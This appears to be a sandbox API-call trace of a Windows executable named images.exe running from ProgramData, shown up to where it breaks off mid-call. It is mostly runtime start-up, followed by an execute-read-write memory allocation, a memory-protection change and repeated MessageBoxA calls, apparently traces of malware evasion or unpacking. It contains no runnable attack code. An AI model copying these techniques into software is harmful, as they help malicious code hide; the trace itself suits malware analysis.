0x774e4490 [0144.640] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0144.648] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0144.648] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0144.649] GetProcessHeap () returned 0x810000 [0144.649] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0144.649] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0144.649] GetLastError () returned 0xcb [0144.649] GetProcAddress (hModule=0x77420000, lpProcName="FlsGetValue") returned 0x774cf350 [0144.649] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0144.649] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x364) returned 0x829120 [0144.650] SetLastError (dwErrCode=0xcb) [0144.650] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0xc00) returned 0x82a5d0 [0144.721] GetStartupInfoW (in: lpStartupInfo=0x19fe98 | out: lpStartupInfo=0x19fe98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x408b30, hStdOutput=0x74a6f49, hStdError=0xfffffffe)) [0144.721] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0144.721] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0144.721] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0144.721] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\"" [0144.721] GetCommandLineW () returned="\"C:\\ProgramData\\images.exe\"" [0144.722] GetACP () returned 0x4e4 [0144.722] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x220) returned 0x827d18 [0144.722] IsValidCodePage (CodePage=0x4e4) returned 1 [0144.722] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19feb8 | out: lpCPInfo=0x19feb8) returned 1 [0144.722] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f780 | out: lpCPInfo=0x19f780) returned 1 [0144.722] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0144.722] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0144.722] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x19f794 | out: lpCharType=0x19f794) returned 1 [0144.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0144.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0144.727] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0144.727] GetProcAddress (hModule=0x77420000, lpProcName="LCMapStringEx") returned 0x774c95f0 [0144.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0144.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0144.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¹\x91\x11\x07Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0144.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0144.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0144.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0144.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0144.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¹\x91\x11\x07Ðþ\x19", lpUsedDefaultChar=0x0) returned 256 [0144.728] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x80) returned 0x81f300 [0144.729] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x54c488, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x22) returned 0x81f130 [0144.729] RtlInitializeSListHead (in: ListHead=0x54c3c0 | out: ListHead=0x54c3c0) [0144.729] GetLastError () returned 0x0 [0144.729] SetLastError (dwErrCode=0x0) [0144.729] GetEnvironmentStringsW () returned 0x82b1d8* [0144.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x0, Size=0x50d) returned 0x82bc00 [0144.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x82bc00, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0144.729] FreeEnvironmentStringsW (penv=0x82b1d8) returned 1 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x90) returned 0x820288 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x1f) returned 0x81a8f0 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x2e) returned 0x81f5a0 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x37) returned 0x8257e8 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x3c) returned 0x822798 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x31) returned 0x8251a8 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x14) returned 0x81a218 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x24) returned 0x81f160 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0xd) returned 0x828e98 [0144.729] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x1d) returned 0x81aaf8 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x31) returned 0x825368 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x15) returned 0x82b948 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x17) returned 0x82b668 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0xe) returned 0x828d48 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x69) returned 0x821378 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x3e) returned 0x822510 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x1b) returned 0x81ab48 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x1d) returned 0x81a918 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x48) returned 0x81fae0 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x12) returned 0x82b7c8 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x18) returned 0x82b968 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x1b) returned 0x81a940 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x24) returned 0x82c200 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x29) returned 0x81f6b8 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x1e) returned 0x81a990 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x6b) returned 0x822028 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x17) returned 0x82b908 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0xf) returned 0x828ec8 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x16) returned 0x82b988 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x2a) returned 0x81f760 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x29) returned 0x81f840 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x12) returned 0x82b608 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x21) returned 0x82c4a0 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x16) returned 0x82b628 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x22) returned 0x82c2c0 [0144.730] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x12) returned 0x82b928 [0144.731] HeapFree (in: hHeap=0x810000, dwFlags=0x0, lpMem=0x82bc00 | out: hHeap=0x810000) returned 1 [0144.732] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x77420000 [0144.733] GetProcAddress (hModule=0x77420000, lpProcName="SleepConditionVariableCS") returned 0x77557f60 [0144.733] GetProcAddress (hModule=0x77420000, lpProcName="WakeAllConditionVariable") returned 0x77898d70 [0144.733] RtlAllocateHeap (HeapHandle=0x810000, Flags=0x8, Size=0x800) returned 0x82c520 [0144.737] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0144.737] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x407f5e) returned 0x0 [0144.739] GetProcessHeap () returned 0x810000 [0144.739] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0144.739] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0144.742] GetCurrentThreadId () returned 0x50c [0144.742] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0144.742] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0144.742] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\"" [0144.742] CoInitialize (pvReserved=0x0) returned 0x0 [0144.898] VirtualAlloc (lpAddress=0x0, dwSize=0xa00000, flAllocationType=0x3000, flProtect=0x40) returned 0x2160000 [0144.899] VirtualProtect (in: lpAddress=0x756bfec0, dwSize=0x100, flNewProtect=0x40, lpflOldProtect=0x19feb4 | out: lpflOldProtect=0x19feb4*=0x20) returned 1 [0144.906] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.906] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.906] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.907] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", 